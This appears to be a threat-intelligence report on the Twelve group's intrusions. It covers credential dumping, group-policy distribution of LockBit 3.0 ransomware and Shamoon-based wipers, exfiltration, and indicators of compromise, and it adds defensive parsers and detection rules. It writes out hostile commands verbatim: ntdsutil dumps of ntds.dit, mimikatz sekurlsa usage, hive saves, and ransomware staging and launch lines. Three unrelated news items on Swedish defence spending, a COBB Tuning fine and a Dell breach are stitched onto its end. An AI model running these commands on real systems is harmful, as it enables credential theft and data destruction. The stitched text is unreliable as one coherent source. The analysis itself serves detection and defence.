12lock | reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A131C020-***}:Actions","Copy-Item -Destination C:\ProgramData | Copies the wiper file with PowerShell from the netlogon network share to C:\ProgramData on the local host |
12lock 1 | reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0B177D41-***}:Actions","cmd.exe | Runs the ransomware from the netlogon network share via the CLI, passing a password as an argument |
Copywiper | reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB72DE3D-***}:Actions","POWERSHELL.EXE \\[DOMAIN]\netlogon\twelve.exe C:\ProgramData | Copies the ransomware file with PowerShell from the netlogon network share to C:\ProgramData on the local host |
run | powershell -ex bypass -f \\[DOMAIN]\netlogon\outlookconf2003.ps1 | Runs a PowerShell script that modifies group policies |
YandexUpdate | \\[DOMAIN]\netlogon\12.exe -pass ************** | Runs the ransomware from the netlogon network share, passing a password as an argument |
Update Microsoft | C:\ProgramData\intel.exe | Launches the wiper |
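Tasks pushed through group policy are defined in SYSVOL before they ever reach a host's Task Scheduler, so the earliest place to catch this stage is the Group Policy Preferences file \\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml. The parser below is an added example written for this report, not the attackers' script or code from the page: it reads such a file and flags task actions that show the tradecraft in the table above (staging from the netlogon share, dropping into ProgramData, the -pass argument, PowerShell with the execution policy bypassed, Copy-Item). The XML is a constructed sample modelled on the GPP ScheduledTasks.xml layout; the domain name corp.local and the uid GUIDs are assumptions, while the task names and command lines are taken from the table.

```python
"""Flag suspicious GPO-deployed scheduled tasks in a GPP ScheduledTasks.xml.

Added example for this report; not the attackers' tooling or code from the
page. SAMPLE_XML is constructed; corp.local and the uid values are assumed.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass


@dataclass(frozen=True)
class GpoTask:
    name: str
    run_as: str
    command: str
    arguments: str
    reasons: tuple


# Indicators of the tradecraft seen in this intrusion. "ProgramData drop" is
# low-signal on its own; the others rarely appear in legitimate GPO tasks.
INDICATORS = [
    ("netlogon share", re.compile(r"\\\\[^\\]+\\netlogon\\", re.I)),
    ("ProgramData drop", re.compile(r"\\programdata\b", re.I)),
    ("LockBit -pass argument", re.compile(r"(^|\s)-pass\s+\S+", re.I)),
    ("PowerShell policy bypass", re.compile(r"powershell(\.exe)?.*\s-ex(ecutionpolicy)?\s+bypass", re.I)),
    ("PowerShell Copy-Item", re.compile(r"\bCopy-Item\b", re.I)),
]

TASK_ITEM_TAGS = {"TaskV2", "ImmediateTaskV2"}


def suspicious_tasks(xml_text):
    """Return a GpoTask for every Exec action whose command line matches at
    least one indicator, in document order."""
    root = ET.fromstring(xml_text)
    found = []
    for item in root:                      # one element per GPP task item
        if item.tag not in TASK_ITEM_TAGS:
            continue
        props = item.find("Properties")
        run_as = props.get("runAs", "") if props is not None else ""
        for exec_ in item.iter("Exec"):    # the inner <Task> may hold several actions
            command = exec_.findtext("Command", "") or ""
            arguments = exec_.findtext("Arguments", "") or ""
            cmdline = f"{command} {arguments}".strip()
            reasons = tuple(label for label, rx in INDICATORS if rx.search(cmdline))
            if reasons:
                found.append(GpoTask(item.get("name", ""), run_as, command, arguments, reasons))
    return found


# Constructed sample in the GPP ScheduledTasks.xml layout.
SAMPLE_XML = r"""<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Dead1" image="2" uid="{9042DCD8-0000-4000-8000-000000000001}">
    <Properties action="C" name="Dead1" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>cmd.exe</Command><Arguments>/c c:\programdata\twelve.exe -pass ***</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Copywiper" image="2" uid="{FB72DE3D-0000-4000-8000-000000000002}">
    <Properties action="C" name="Copywiper" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>POWERSHELL.EXE</Command><Arguments>Copy-Item \\corp.local\netlogon\twelve.exe -Destination C:\ProgramData</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="run" image="2" uid="{00000000-0000-4000-8000-000000000003}">
    <Properties action="C" name="run" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>powershell.exe</Command><Arguments>-ex bypass -f \\corp.local\netlogon\outlookconf2003.ps1</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Update Microsoft" image="2" uid="{00000000-0000-4000-8000-000000000004}">
    <Properties action="C" name="Update Microsoft" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>C:\ProgramData\intel.exe</Command><Arguments></Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Defrag" image="2" uid="{00000000-0000-4000-8000-000000000005}">
    <Properties action="C" name="Defrag" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>C:\Windows\System32\defrag.exe</Command><Arguments>-C -h -o</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

if __name__ == "__main__":
    for t in suspicious_tasks(SAMPLE_XML):
        print(f"{t.name!r} as {t.run_as}: {t.command} {t.arguments}  <- {', '.join(t.reasons)}")
```

Feeding every ScheduledTasks.xml under SYSVOL through suspicious_tasks, together with a watch on Event ID 5136 (or file auditing) for that path, catches the payload before the group-policy refresh pushes it to the fleet, which is earlier than any host-side scheduled-task telemetry.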
Credential Access
The adversary used mimikatz to obtain user credentials. They saved the utility under the name calculator.exe to disguise its purpose, but did not bother to change its default icon. The attackers used mimikatz to dump credentials from the memory of the lsass.exe process.
Screenshot of calculator.exe running
We found artifacts indicating that mimikatz was used on compromised hosts, both in the form of an executable file and a PowerShell script.
C:\Users\[User]\Desktop\x64\mimikatz.exe
C:\Users\[User]\Desktop\CrackMapExecWin_v2.2\hosted\Invoke-Mimikatz.ps1
C:\[Redacted]\x64\mimidrv.sys
In addition to dumping lsass.exe with mimikatz, the adversary obtained local credentials by saving the SYSTEM, SAM and SECURITY registry hives with the reg.exe system utility to the Downloads folder for subsequent archiving and exfiltration.
C:\Users\[USER]\Downloads\SYSTEM
C:\Users\[USER]\Downloads\SAM
C:\Users\[USER]\Downloads\SECURITY
The attackers also went after domain credentials. To do this, they used the ntdsutil.exe system utility to create an Install From Media (IFM) snapshot, which writes a consistent copy of ntds.dit, together with the SYSTEM hive needed to decrypt it, to the specified folder.
The command that dumps ntds.dit, as recorded in the log (quoting artifacts included), is shown below:
$system32\ntdsutil.exe",""$system32\ntdsutil.exe" "ac i ntds" ifm "create full c:\temp" q q
To extract additional credentials from the system, the attackers then used the console version of XenArmor's All-In-One Password Recovery Pro utility, which recovers credentials stored by applications installed on the system (browsers, mail clients, Wi-Fi profiles and the like).
The command to collect data with All-In-One Password Recovery Pro is shown below:
c:\programdata\update\xenallpasswordpro.exe" -a "c:\programdata\update\report.html"
In the screenshot below, you can see an example of running this utility with the parameters that the attackers used, and a list of data that it collects when configured like that.
Lateral Movement
To move within the victim’s infrastructure, the adversary used local and domain credentials obtained in earlier phases of the attack.
In most cases they connected to new devices on the victim's network over the Remote Desktop Protocol (RDP) using mstsc.exe. Occasionally they used PsExec to move laterally over SMB, or started an interactive session on a remote computer with Enter-PSSession, the PowerShell Remoting cmdlet for managing and running commands on remote systems.
Enter-PSSession -ComputerName [COMPUTER 1]
Enter-PSSession -ComputerName [COMPUTER 2]
Enter-PSSession -ComputerName [COMPUTER 3]
Enter-PSSession sets up a temporary interactive session between the local and remote systems, allowing the adversary to run PowerShell commands on the remote machine as if running them locally. The transport is WS-Management (WinRM) over HTTP (TCP 5985 by default) or HTTPS (TCP 5986), so WinRM listener activity on the target and, where script block logging is enabled, Event ID 4104 on the remote host record the session.
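Almost everything in the Discovery, Execution, Credential Access and Lateral Movement phases above was typed into PowerShell or cmd.exe, which means it lands in two log sources: PowerShell script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) and process creation auditing (Security 4688 with command-line logging, or Sysmon Event ID 1). The rule set below is an added example written for this report, not detection content from the page: it runs a handful of regular expressions matching the recorded commands (the mistyped PowerView imports, Set-ExecutionPolicy bypass, the Get-Domain*/Get-AD* enumeration, ntdsutil IFM, hive dumps with reg.exe, mimikatz, the XenArmor utility and Enter-PSSession) over a list of event records and summarises ATT&CK techniques per host. The events, host names and users are constructed; the field names are this example's own; and the `reg save hklm\...` and `sekurlsa::logonpasswords` command lines are assumed, since the report only states that reg.exe and mimikatz were used, not their exact arguments.

```python
"""Rule-based hunt over PowerShell script-block (4104) and process-creation
(4688 / Sysmon 1) records for the commands recorded in this report.

Added example for this report; not the page's or the vendor's detection
content. SAMPLE_EVENTS is constructed; the reg.exe and mimikatz command
lines are assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

SCRIPT_BLOCK = {4104}       # Microsoft-Windows-PowerShell/Operational, ScriptBlockText
PROCESS_CREATE = {4688, 1}  # Security 4688 CommandLine, Sysmon 1 CommandLine


@dataclass(frozen=True)
class Event:
    event_id: int
    host: str
    user: str
    text: str   # ScriptBlockText or CommandLine


@dataclass(frozen=True)
class Rule:
    name: str
    sources: frozenset
    pattern: re.Pattern
    technique: str   # MITRE ATT&CK technique ID


def _rule(name, sources, regex, technique):
    return Rule(name, frozenset(sources), re.compile(regex, re.IGNORECASE | re.MULTILINE), technique)


RULES = [
    # The operator mistyped the import several times ("impot", "import"); match any such prefix.
    _rule("PowerView import attempt", SCRIPT_BLOCK, r"^\s*(Import-Module|impo?r?t)\s+\S*PowerView\.ps1", "T1059.001"),
    _rule("Execution policy bypass", SCRIPT_BLOCK, r"\bSet-ExecutionPolicy\s+bypass\b", "T1059.001"),
    _rule("Domain account/group enumeration", SCRIPT_BLOCK,
          r"\b(Get-Domain(Object|User|Group|GroupMember)|Get-ADUsers?|Get-ADGroup(Member)?)\b", "T1087.002"),
    _rule("PowerShell Remoting session", SCRIPT_BLOCK, r"\bEnter-PSSession\s+-ComputerName\b", "T1021.006"),
    _rule("Mimikatz", SCRIPT_BLOCK | PROCESS_CREATE, r"mimikatz|mimidrv\.sys|sekurlsa::", "T1003.001"),
    _rule("NTDS dump via ntdsutil IFM", PROCESS_CREATE, r"ntdsutil(\.exe)?\b.*\bifm\b.*create\s+full", "T1003.003"),
    _rule("Registry hive dump", PROCESS_CREATE, r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", "T1003.002"),
    _rule("Password recovery tool", PROCESS_CREATE, r"xenallpasswordpro(\.exe)?\s+-a\b", "T1555"),
]


def scan(events, rules=RULES):
    """Return (host, user, rule name, technique) for every rule that matches an event."""
    hits = []
    for ev in events:
        for rule in rules:
            if ev.event_id in rule.sources and rule.pattern.search(ev.text):
                hits.append((ev.host, ev.user, rule.name, rule.technique))
    return hits


def by_host(hits):
    """Set of techniques observed per host, for scoping the intrusion."""
    out = defaultdict(set)
    for host, _user, _name, technique in hits:
        out[host].add(technique)
    return dict(out)


# Constructed sample telemetry (hosts, users and exact arguments are made up).
SAMPLE_EVENTS = [
    Event(4104, "WS01", "CORP\\jdoe", "impot .\\PowerView.ps1"),
    Event(4104, "WS01", "CORP\\jdoe", "Set-ExecutionPolicy bypass"),
    Event(4104, "WS01", "CORP\\jdoe", "Import-Module .\\PowerView.ps1"),
    Event(4104, "WS01", "CORP\\jdoe", "Get-DomainGroupMember engineers"),
    Event(4104, "WS01", "CORP\\jdoe", "Get-ADUser -Filter * -SearchBase \"OU=Staff,DC=corp,DC=local\""),
    Event(4104, "WS01", "CORP\\jdoe", "Enter-PSSession -ComputerName FILESRV01"),
    Event(4688, "DC01", "CORP\\admin", "C:\\Windows\\System32\\ntdsutil.exe \"ac i ntds\" ifm \"create full c:\\temp\" q q"),
    Event(4688, "WS01", "CORP\\jdoe", "reg.exe save hklm\\sam C:\\Users\\jdoe\\Downloads\\SAM"),
    Event(1, "WS01", "CORP\\jdoe", "C:\\Users\\jdoe\\Documents\\calculator.exe privilege::debug sekurlsa::logonpasswords"),
    Event(4688, "WS01", "CORP\\jdoe", "c:\\programdata\\update\\xenallpasswordpro.exe -a c:\\programdata\\update\\report.html"),
    Event(4104, "WS02", "CORP\\bob", "Get-Process | Where-Object CPU -gt 100"),
]

if __name__ == "__main__":
    for host, techniques in sorted(by_host(scan(SAMPLE_EVENTS)).items()):
        print(host, sorted(techniques))
```

The renamed mimikatz binary (calculator.exe) is caught by its command line rather than its file name, which is why the process-creation rule keys on module syntax such as sekurlsa:: instead of the image path. Note that the enumeration rule will also fire on administrators doing their job; it is meant to be correlated with the other hits on the same host, as by_host does, not alerted on alone.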
Unified Kill Chain: Out
The Out stage of the Unified Kill Chain describes the adversary's concluding actions after they have infiltrated the target network and gained access to all the systems and data they were after. This stage focuses on achieving the ultimate goals of the attack, which may include data theft, sabotage or other actions that compromise the confidentiality, integrity and availability (CIA) of the victim's information assets.
Collection
The adversary collected substantial amounts of sensitive information about their victims: financial documents, technical drawings, corporate email and so on. They used 7-Zip to archive the collected data and forwarded it via cloud file sharing services.
Also during their attacks, the adversary archived and exfiltrated the Telegram data folder (tdata).
C:\Users\[User]\AppData\Roaming\Telegram Desktop\tdata\tdata.7z
This folder contains cached media files (images, videos, audio), messages, stickers and documents the user has sent or received via Telegram; the cache lets the client display content without downloading it again from the servers. The tdata folder also contains session files that allow the application to reconnect to the account without the user having to re-enter their login and password.
An adversary who gains access to the folder can extract private messages, media files and documents, which results in the leakage of sensitive personal or commercial information. The adversary can leverage session files and encryption keys to bypass authentication when signing in to a Telegram account, to read chats and to impersonate the victim when sending messages.
Exfiltration
The adversary uploaded archives containing data they were interested in to dropmefiles.net/ via a browser. We learned that DropMeFiles was the file sharing service they used when we found a page header that read, “Завантаження вдалося! – dropmefiles.net” (“Upload successful!” – dropmefiles.net) in the browser cache in the aftermath of an attack.
Impact
Ransomware
The attackers used a version of the popular LockBit 3.0 ransomware, compiled from publicly available source code, to encrypt the data.
Kaspersky Threat Attribution Engine attribution
We detected ransomware files at the following paths:
- \ProgramData\;
- \\netlogon\.
The following file names featured in known incidents involving LockBit 3.0 ransomware.
- twelve.exe;
- 1.exe;
- 12.exe;
- enc.exe;
- betta.exe;
- sed.exe;
- svo.exe.
Below is a detonation graph for the ransomware, built by Kaspersky Cloud Sandbox. It displays file execution and suspicious events that occur in the process. As you can see from the graph, the ransomware is quite noisy and generates a lot of events that give away its activity.
Detonation graph for the ransomware used by Twelve
As previously mentioned under Execution, the ransomware leverages group policies to spread across its victims’ infrastructures. The attackers used PowerShell to move the ransomware file to the netlogon network share and then ran a script to modify group policies.
powershell.exe -ex bypass -f C:\Users\Public\gpo.ps1
After updating the policies, they set up scheduled tasks on all domain computers to copy and run the ransomware.
First, the ransomware was moved from the netlogon network share to the local ProgramData directory by the Copywiper task as follows:
powershell.exe Copy-Item \\[DOMAIN]\netlogon\twelve.exe -Destination C:\ProgramData
After this, they started the ransomware from a local folder or network share via the CLI, specifying a unique password as the -pass argument:
cmd.exe /c c:\programdata\twelve.exe -pass ************
The ransomware's behaviour is governed by its embedded configuration. The table below shows the configuration of the Trojan in question, which was identical across all the samples we found.
Parameter | Meaning | Description |
encrypt_mode | auto | Set encryption mode for large files. This takes one of two values: “auto” or “fast”. |
encrypt_filename | TRUE | Encrypt file name |
impersonation | FALSE | Use accounts listed in configuration file to escalate privileges |
skip_hidden_folders | FALSE | Skip hidden directories |
language_check | FALSE | Check system locale |
local_disks | TRUE | Encrypt local drives |
network_shares | TRUE | Encrypt network directories |
kill_processes | TRUE | Terminate processes |
kill_services | TRUE | Stop services |
running_one | TRUE | Verify that only one ransomware process is running |
print_note | FALSE | Print out ransom demand |
set_wallpaper | FALSE | Change desktop wallpaper |
set_icons | FALSE | Change icons of encrypted files |
send_report | FALSE | Send system information to C2 |
self_destruct | TRUE | Remove itself when done |
kill_defender | TRUE | Stop Windows Defender |
wipe_freespace | FALSE | Fill all available disk space with temporary file containing random data |
psexec_netspread | FALSE | Spread across network via PsExec service |
gpo_netspread | FALSE | Spread across network via group policies |
gpo_ps_update | TRUE | Use PowerShell to update group policies across all domains |
shutdown_system | FALSE | Restart system |
delete_eventlogs | TRUE | Clear system logs |
delete_gpo_delay | 0 | Deferred removal of group policy. The value in this parameter describes the time to delay deletion by. |
The configuration file also contains a list of directories where encryption should be skipped:
$recycle.bin, boot, Tor browser, config.msi, program files, windows.old, $windows.~bt, program files (x86), intel, $windows.~ws, programdata, msocache, windows, system volume information, perflogs, x64dbg, public, all users, default, Microsoft
It also contains a list of specific files that should not be encrypted:
autorun.inf, boot.ini, bootfont.bin, bootsect.bak, desktop.ini, iconcache.db, ntldr, ntuser.dat, ntuser.dat.log, ntuser.ini, thumbs.db, d3d9caps.dat, GDIPFONTCACHEV1.DAT
Finally, the ransomware does not encrypt files with the following name extensions:
386, adv, ani, bat, bin, cab, cmd, com, cpl, cur, deskthemepack, diagcab, diagcfg, diagpkg, dll, drv, exe, hlp, icl, icns, ico, ics, idx, lnk, mod, mpa, msc, msp, msstyles, msu, nls, nomedia, ocx, prf, ps1, rom, rtp, scr, shs, spl, sys, theme, themepack, wpx, lock, key, hta, msi, pdb, search-ms
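Taken together, the configuration flags (local_disks and network_shares on, skip_hidden_folders off) and the three exclusion lists define exactly which files the Trojan touches, and that is what determines the recovery picture: scripts, executables and anything under ProgramData, Public or a directory named Microsoft survive, while user documents on local disks and reachable shares do not. The predicate below is an added example written for this report, not the ransomware's code: it reproduces those exclusion rules over Windows paths so a responder can estimate blast radius from a file listing. The matching semantics (case-insensitive comparison of whole path components, file names and extensions) are this example's assumption; the lists themselves are the ones shown above.

```python
"""Decide whether a path would be encrypted under the LockBit 3.0
configuration and exclusion lists shown in this report.

Added example for this report; not the ransomware's own code. Matching
semantics (whole, case-insensitive component comparison) are assumed.
"""

SKIP_DIRS = frozenset(s.lower() for s in [
    "$recycle.bin", "boot", "Tor browser", "config.msi", "program files", "windows.old",
    "$windows.~bt", "program files (x86)", "intel", "$windows.~ws", "programdata", "msocache",
    "windows", "system volume information", "perflogs", "x64dbg", "public", "all users",
    "default", "Microsoft",
])
SKIP_FILES = frozenset(s.lower() for s in [
    "autorun.inf", "boot.ini", "bootfont.bin", "bootsect.bak", "desktop.ini", "iconcache.db",
    "ntldr", "ntuser.dat", "ntuser.dat.log", "ntuser.ini", "thumbs.db", "d3d9caps.dat",
    "GDIPFONTCACHEV1.DAT",
])
SKIP_EXTS = frozenset("""386 adv ani bat bin cab cmd com cpl cur deskthemepack diagcab diagcfg
diagpkg dll drv exe hlp icl icns ico ics idx lnk mod mpa msc msp msstyles msu nls nomedia ocx
prf ps1 rom rtp scr shs spl sys theme themepack wpx lock key hta msi pdb search-ms""".split())


def split_windows_path(path):
    """Return (directory_components, file_name) for a local or UNC Windows path."""
    parts = [p for p in path.replace("/", "\\").split("\\") if p]
    if not parts:
        return [], ""
    if path.startswith("\\\\"):                      # \\server\share\...: neither is a directory
        parts = parts[2:]
    elif len(parts[0]) == 2 and parts[0][1] == ":":  # drive letter
        parts = parts[1:]
    if not parts:
        return [], ""
    return parts[:-1], parts[-1]


def skip_reason(path, hidden_components=frozenset(), skip_hidden_folders=False):
    """Why the ransomware would leave `path` alone, or None if it would encrypt it.

    hidden_components: directory names carrying the hidden attribute (the file
    system knows this, a path string does not). skip_hidden_folders mirrors the
    config flag, which is FALSE in the samples analysed here."""
    dirs, name = split_windows_path(path)
    for d in dirs:
        if d.lower() in SKIP_DIRS:
            return f"directory '{d}' is excluded"
        if skip_hidden_folders and d in hidden_components:
            return f"directory '{d}' is hidden"
    lname = name.lower()
    if lname in SKIP_FILES:
        return f"file name '{name}' is excluded"
    ext = lname.rsplit(".", 1)[1] if "." in lname else ""
    if ext in SKIP_EXTS:
        return f"extension '.{ext}' is excluded"
    return None


def would_encrypt(path, **kwargs):
    return skip_reason(path, **kwargs) is None


if __name__ == "__main__":
    for p in [r"C:\Users\alice\Documents\report.docx", r"\\fileserver\projects\drawings\plan.dwg",
              r"C:\Users\alice\Desktop\backup.ps1", r"C:\Users\alice\AppData\Roaming\Microsoft\Outlook\archive.pst"]:
        print(p, "->", skip_reason(p) or "ENCRYPTED")
```

One consequence worth noting from running this over a real listing: any directory named Microsoft is skipped wherever it sits, so Outlook data files under AppData\Roaming\Microsoft survive even though mailboxes were among the data the attackers collected.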
Before starting work, the ransomware terminates processes that may interfere with the encryption of individual files. The names of the processes to be terminated are listed below:
sql, oracle, ocssd, dbsnmp, synctime, agntsvc, isqlplussvc, xfssvccon, mydesktopservice, ocautoupds, encsvc, firefox, tbirdconfig, mydesktopqos, ocomm, dbeng50, sqbcoreservice, excel, infopath, msaccess, mspub, onenote, outlook, powerpnt, steam, thebat, thunderbird, visio, winword, wordpad, notepad, calc, wuauclt, onedrive
The ransomware also stops the following services:
vss, sql, svc$, memtas, mepocs, msexchange, veeam, backup, GxVss, GxBlr, GxFWD, GxCVD, kavfs, AVP, avpsus
Interestingly, the configuration for creating a ransom note lacks any contacts or ways of reaching out to the attackers. The final note consists of just the group logo.
We also found that in some cases, attackers used a Trojan made from a leaked builder for the Chaos ransomware to encrypt files. We discovered samples of that ransomware at the following paths:
c:\netlogon\enc.exe |
c:\Users\User\enc.exe |
c:\Windows\System32\config\systemprofile\appdata\roaming\twelve.exe |
c:\Windows\sysvol\domain\scripts\enc.exe |
As you can see from the screenshot below, the Kaspersky Threat Attribution Engine detects that one of these samples bears 60% similarity to Chaos.
Result of the Kaspersky Threat Attribution Engine file attribution
At the time we discovered the samples, it was unclear who was behind the incidents in which they were used. However, static analysis showed that the code contained characteristic lines linking the samples to the Twelve group.
Result of the static analysis of Chaos-based ransomware
Wipers
In addition to the ransomware, the adversary used wipers to destroy their victims’ infrastructures. They typically ran the wipers after encrypting files.
The wiper file we found had been compiled from publicly available source code. The wiper overwrites the master boot record (MBR) of the connected drives, so that the next time the victim turns the device on, the message "From Iran with love - Shamoon" appears on the screen and the operating system no longer loads.
The file then recursively goes through each directory, except for Windows and System Volume Information, on all mounted drives, and does the following for each file:
- Overwrite the file contents with randomly generated bytes;
- Overwrite file metadata: reset size and set random created/modified/opened dates;
- Assign a random name to the file and delete it.
When done, the malicious file deletes itself and shuts down the system.
As we conducted our dynamic and static analyses, we concluded that the wiper version was identical to the publicly available one.
Wiper detonation graph in Kaspersky Cloud SandBox
Result of the wiper static analysis
Also while researching the attacks by Twelve, we discovered another version of the wiper. The sample was identical to Shamoon, except for a number of specifically renamed functions.
Renamed Shamoon-based wiper features
While investigating attacks by the group, we found wiper files at the following paths:
- \Desktop\;
- \ProgramData\;
- \\netlogon\.
The following file names have featured in known incidents involving the wiper:
- intel.exe;
- mail.exe;
- wiper.exe.
The wiper's spread pattern across a victim's infrastructure is almost identical to that of the ransomware. The adversary uses PowerShell to copy the wiper file to the netlogon network share and then runs a script that modifies group policies and creates scheduled tasks.
powershell -ex bypass -f \\[DOMAIN]\netlogon\outlookconf2003.ps1
The wiper file is then copied from the netlogon network share to the local ProgramData folder on all previously encrypted domain computers.
powershell.exe Copy-Item \\[DOMAIN]\netlogon\intel.exe -Destination C:\ProgramData
After this, a scheduled task starts and runs the wiper file, which destroys data on the device.
C:\ProgramData\intel.exe
Wiper spread pattern in the victim’s infrastructure
Objectives
The threat actor’s strategic goals:
- Destroy critical infrastructure and disrupt business;
- Steal sensitive data;
- Discredit victims by reporting the compromise on the attackers’ Telegram channel.
Takeaways
Twelve is mainly driven by hacktivism rather than financial gain. This shows in their modus operandi: rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims’ data and then destroy their infrastructure with a wiper to prevent recovery. The approach is indicative of a desire to cause maximum damage to target organizations without deriving direct financial benefit.
Our analysis also shows that the group sticks to a publicly available and familiar arsenal of malware tools, suggesting it develops no tooling of its own. This makes it possible to detect and prevent Twelve's attacks in good time. Failing to do so can leave the organization's infrastructure severely damaged by the threat actor.
Indicators of compromise
Web-Shells
05d80c987737e509ba8e6c086df95f7d
48b2e5c49f121d257b35ba599a6cd350
5dcd02bda663342b5ddea2187190c425
97aac7a2f0d2f4bdfcb0e8827a111524
dad076c784d9fcbc506c1e614aa27f1c
ecb14e506727ee67220e87ced2e6781a
f8da1f02aa64e844770e447709cdf679
Mimikatz
e930b05efe23891d19bc354a4209be3e
Scripts
7a7c0a521b7596318c7cd86582937d98
72830102884c5ebccf2afbd8d9a9ed5d
31014add3cb96eee557964784bcf8fde
7dfa50490afe4553fa6889bdafda7da2
Ngrok
43b3520d69dea9b0a27cce43c1608cad
Cobalt Strike
7bec3c59d412f6f394a290f95975e21f
Ransomware
9c74401a28bd71a87cdf5c17ad1dffa5 twelve.exe
d813f5d37ab2feed9d6a2b7d4d5b0461 12.exe
646a228c774409c285c256a8faa49bde enc.exe
5c46f361090620bfdcac6afce1150fae twelve.exe
9bd78bcf75b9011f9d7a9a6e5aee5bf6 twelve.exe
f90e95b9fcab4c1b08ca06bc2c2d6e40 12.exe
39b91f5dfbbec13a3ec7cce670cf69ad sed.exe/1.exe/Screen2.exe/SVO.exe/BETTA.EXE
Wiper
4bff90a6f7bafc8e719e8cab87ab1766 intel.exe/mail.exe
File paths
C:\ProgramData\sed.exe
C:\Users\{username}\Downloads\sed.exe
C:\Users\{username}\Desktop\sed.exe
C:\programdata\svchost\svchost.exe
C:\programdata\svchost\svchost.yml
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.exe
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.yml
C:\Users\{username}\Desktop\svchost.exe
C:\Users\{username}\Desktop\svchost.yml
C:\users\{username}\pictures\photos_delo\loop.exe
C:\users\{username}\downloads\chisel_1.9.1_windows_amd64\chisel.exe
C:\Users\{username}\Documents\PowerView.ps1
C:\Users\{username}\Documents\calculator.exe
C:\Windows\qbkLIdag.exe
C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL\domain\scripts\intel.exe
C:\Windows\SYSVOL\domain\scripts\outlookconf2003.ps1
C:\Windows\SYSVOL\domain\scripts\ZZZZZZ
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe
\\[DOMAIN]\netlogon\12.exe
\\[DOMAIN]\netlogon\outlookconf2003.ps1
\\[DOMAIN]\netlogon\intel.exe
C:\123\12.exe
C:\ProgramData\intel.exe
C:\Users\Public\46a2209036e6282c45f8dfd3f046033d.ps1
C:\Users\Public\gpo.ps1
C:\Windows\Logs\PsExec.exe
Domains and IPs
212.109[.]217.88
195.2[.]79.195
109.205[.]56.229
193.110[.]79.47
217.148[.]143.196
5.8[.]16.147
5.8[.]16.148
5.8[.]16.149
5.8[.]16.169
5.8[.]16.170
5.8[.]16.236
5.8[.]16.238
79.137[.]69.34
85.204[.]124.94
89.238[.]132.68
89.33[.]8.198
91.90[.]121.220
Sweden increases military spending by 10%
@Notizie dall'Italia e dal mondo
In Sweden, the government has decided to increase the defence budget to support the strengthening of NATO's northern flank.
The article “La Svezia aumenta le spese militari del 10%” originally appeared on Pagine Esteri.
COBB Tuning Hit With $2.9 Million Fine Over Emissions Defeat Devices
Recently, the EPA and COBB Tuning settled after the latter was sued for providing equipment that defeats emission controls. As per the EPA's settlement document, COBB Tuning has since 2015 provided customers with the means to disable certain emission controls in cars, in addition to selling aftermarket exhaust pipes with insufficient catalytic systems. As part of the settlement, COBB Tuning will have to destroy any remaining devices, delete any such features from its custom tuning software and otherwise take measures to fully comply with the Clean Air Act, in addition to paying a $2,914,000 civil fine.
The tuning of cars has come a long way from the 1960s when tweaking the carburetor air-fuel ratios was the way to get more power. These days cars not only have multiple layers of computers and sensor systems that constantly monitor and tweak the car’s systems, they also have a myriad of emission controls, ranging from permissible air-fuel ratios to catalytic converters. It’s little surprise that these systems can significantly impact the raw performance one might extract from a car’s engine, but if the exhaust of nitrogen-oxides and other pollutants is to be kept within legal limits, simply deleting these limits is not a permissible option.
COBB Tuning proclaimed that they weren't aware of these issues, and that they never marketed these features as 'emission controls defeating'. They were however aware of issues regarding their products, which is why they announced 'Project Green Speed' in 2022, which supposedly would have brought COBB into compliance. Now it would seem that the EPA did find fault despite this, and COBB was forced to make adjustments.
Although perhaps not as egregious as modifying diesel trucks to ‘roll coal’, federal law has made it abundantly clear that if you really want to have fun tweaking and tuning your car without pesky environmental laws getting in the way, you could consider switching to electric drivetrains, even if they’re mind-numbingly easy to make performant compared to internal combustion engines.
New data breach at Dell: confidential information on more than 10,000 users exposed
Dell Technologies, one of the leading US technology companies, has recently been involved in an alleged data breach. A hacker known by the alias “grep” claims to have breached Dell's systems, exposing the data of more than 10,800 employees and internal partners. The information was published on a dark web forum, raising significant concerns about the company's security.
According to the report, the leaked data includes sensitive employee details such as IDs, full names, employment status and internal IDs. The forum post, accompanied by a sample of the stolen data, indicated that the breach took place in early September 2024.
At the moment we cannot confirm the accuracy of this report, since the organisation has not yet published an official statement about the incident on its website. This article should therefore be treated as an intelligence source.
